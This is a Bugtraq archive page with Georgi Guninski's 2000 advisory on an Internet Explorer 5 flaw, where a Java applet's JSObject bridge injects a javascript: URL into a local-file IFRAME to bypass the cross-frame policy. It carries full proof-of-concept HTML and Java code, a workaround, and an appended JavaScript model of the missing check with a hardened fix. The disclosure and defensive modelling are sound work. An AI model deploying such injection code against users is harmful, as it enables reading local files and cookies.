Bugtraq mailing list archives
IE 5 security vulnerability - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy)
From: joro () NAT BG (Georgi Guninski)
Date: Tue, 18 Apr 2000 16:20:48 +0300
Georgi Guninski security advisory #10, 2000

IE 5 security vulnerability - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy)

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:
Internet Explorer 5.01 under Windows 98 (I suppose all other versions are also vulnerable) allows circumventing the "Cross frame security policy" by accessing the DOM of documents using Java/JavaScript. This exposes the whole DOM of the target document and opens lots of security risks. It allows reading local files, reading files from any host, window spoofing, getting cookies, etc.

Details:
Note: This is NOT a bug in the Java language; this is a bug in Microsoft's implementation of Java in IE.

Usually, IE 5.x does not allow assigning "javascript:" URLs to the location object because this is dangerous. But this may be circumvented with the help of the interaction between Java and the DOM/JavaScript. The Java JSObject allows setting DOM properties from Java, and allows setting a hostile javascript: URL to an IFRAME's location. This leads to circumventing the cross-frame security policy.

Another issue is that choosing the option "Disable Active Scripting" from the security menu does not always disable Active Scripting. If you have Java enabled and Scripting of Java applets enabled, Active Scripting may be executed. The problem seems to be the fact that IE always executes Active Scripting in the "My Computer" zone, and with Java one may inject javascript: URLs into IFRAMEs in the "My Computer" zone.

So, to really disable Active Scripting, disable Active Scripting and disable Java and/or Scripting of Java applets.

The code is:
------jsinject.html--------------------------------
<!-- The target: a local file, loaded in the "My Computer" zone -->
<IFRAME ID="I1" NAME="I1" SRC="file://c:/test.txt"></IFRAME>
<!-- MAYSCRIPT lets the applet reach the page's DOM through JSObject -->
<applet MAYSCRIPT code="jsinject">
<param name="jscode" value="javascript:alert(document.body.innerText)">
</applet>
<A HREF="javascript:document.applets[0].doit()">Read the file</A>
---------------------------------------------------
------jsinject.java--------------------------------
import java.applet.Applet;
import netscape.javascript.*;

public class jsinject extends Applet
{
  // Called from the page via document.applets[0].doit()
  public void doit()
  {
    try
    {
      // Walk window -> document -> IFRAME I1 -> location over the JSObject bridge
      JSObject win = (JSObject) JSObject.getWindow(this);
      JSObject doc = (JSObject) win.getMember("document");
      JSObject I1  = (JSObject) doc.getMember("I1");
      JSObject loc = (JSObject) I1.getMember("location");
      // The assignment script itself is not allowed to make: the javascript:
      // URL from the "jscode" parameter runs in the IFRAME's file:// context
      loc.setMember("href", getParameter("jscode"));
    }
    catch (Exception x) { System.out.println(x.toString()); }
  }
}
---------------------------------------------------

Demonstration is available at:
http://www.nat.bg/~joro/jsinject.html

Workaround: Disable Java or disable Scripting of Java applets

Copyright 2000 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro
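The following is an added example, not code from the advisory or from Microsoft: it models the cross-frame check the advisory describes, which IE 5 applied when script assigned a javascript: URL to a frame's location but not when the same assignment arrived through the Java JSObject bridge. The unchecked bridge is shown beside a hardened one that routes every writer of location.href through a single gate. Assumptions: URLs are parsed with the WHATWG URL class that Node provides globally; all file: documents are treated as one "local" origin, a simplification standing in for IE's "My Computer" zone; the page, frame and payload values are taken from jsinject.html above, with the frame URL written in the normalized file:///c:/test.txt form.

```javascript
// Added example (not from the advisory): a model of the cross-frame check that
// the advisory says IE 5 applied to script assignments of location.href but
// not to the same assignment arriving through the Java JSObject bridge.
// Assumptions: WHATWG URL parsing (Node's global URL); every file: document is
// treated as one "local" origin, a simplification standing in for IE's
// "My Computer" zone.

function originOf(href) {
  const u = new URL(href);
  if (u.protocol === "file:") return "local"; // simplification, see above
  return `${u.protocol}//${u.host}`;          // host keeps a non-default port
}

// The gate: a javascript: URL may be assigned to a frame's location only by a
// document of the frame's own origin; ordinary navigations are not restricted.
function checkFrameNavigation(callerHref, frameHref, target) {
  const url = new URL(target, callerHref);
  if (url.protocol !== "javascript:") {
    return { allowed: true, reason: "ordinary navigation" };
  }
  if (originOf(callerHref) === originOf(frameHref)) {
    return { allowed: true, reason: "javascript: URL from the frame's own origin" };
  }
  return {
    allowed: false,
    reason: `javascript: URL from ${originOf(callerHref)} into ${originOf(frameHref)} frame`,
  };
}

// One IFRAME; `executed` records every javascript: URL that would be evaluated
// with the frame document's privileges.
function makeFrame(href) {
  return { href, executed: [] };
}

function applyNavigation(frame, target, callerHref) {
  const url = new URL(target, callerHref);
  if (url.protocol === "javascript:") {
    frame.executed.push(url.href);
  } else {
    frame.href = url.href;
  }
}

// Path 1: script writes frame.location.href; this path was checked.
function scriptSetHref(callerHref, frame, target) {
  const verdict = checkFrameNavigation(callerHref, frame.href, target);
  if (verdict.allowed) applyNavigation(frame, target, callerHref);
  return verdict;
}

// Path 2, as the advisory describes it: JSObject.setMember("href", ...) reaches
// the frame without the check, so the payload runs in the frame's zone.
function jsObjectSetHrefUnchecked(callerHref, frame, target) {
  applyNavigation(frame, target, callerHref);
  return { allowed: true, reason: "bridge bypassed the cross-frame check" };
}

// Path 2, hardened: every writer of location.href goes through the same gate,
// so the bridge can do no more than script in the same document could.
function jsObjectSetHrefChecked(callerHref, frame, target) {
  return scriptSetHref(callerHref, frame, target);
}

// Replays the advisory's scenario through both versions of the bridge.
function demo() {
  const page = "http://www.nat.bg/~joro/jsinject.html";
  const payload = "javascript:alert(document.body.innerText)";
  const unchecked = makeFrame("file:///c:/test.txt");
  jsObjectSetHrefUnchecked(page, unchecked, payload);
  const checked = makeFrame("file:///c:/test.txt");
  const verdict = jsObjectSetHrefChecked(page, checked, payload);
  return {
    uncheckedRan: unchecked.executed.length,
    checkedRan: checked.executed.length,
    checkedReason: verdict.reason,
  };
}

console.log(demo());
```

The point the model makes is structural: the check belongs at the property setter, not in the script engine, so that every caller (script, the Java bridge, or any other host object that can write to location) is subject to it. Note also that the gate only restricts javascript: targets; cross-origin navigation to an ordinary URL is permitted, which is why the non-script case returns allowed.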
Current thread:
- IE 5 security vulnerability - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy) Georgi Guninski (Apr 18)
- RFP2K03: Contemplations on dvwssr.dll and its affects on life rain forest puppy (Apr 20)
- Microsoft Security Bulletin (MS00-026) Microsoft Product Security (Apr 20)
- Re: IE 5 security vulnerability - circumventing Cross-frame security policy using Java/JavaScript (and disabling Active Scripting is not that easy) TAKAGI, Hiromitsu (Apr 20)
- freebsd libncurses overflow Przemyslaw Frasunek (Apr 24)
- Re: freebsd libncurses overflow Kris Kennaway (Apr 24)
- Re: freebsd libncurses overflow Kris Kennaway (Apr 24)
- Re: freebsd libncurses overflow Przemyslaw Frasunek (Apr 25)
- freebsd libncurses overflow Przemyslaw Frasunek (Apr 24)
- Re: freebsd libncurses overflow Bill Fumerola (Apr 24)
- Re: freebsd libncurses overflow Theo de Raadt (Apr 26)
- Denial of Service Against pcAnywhere. Vacuum (Apr 25)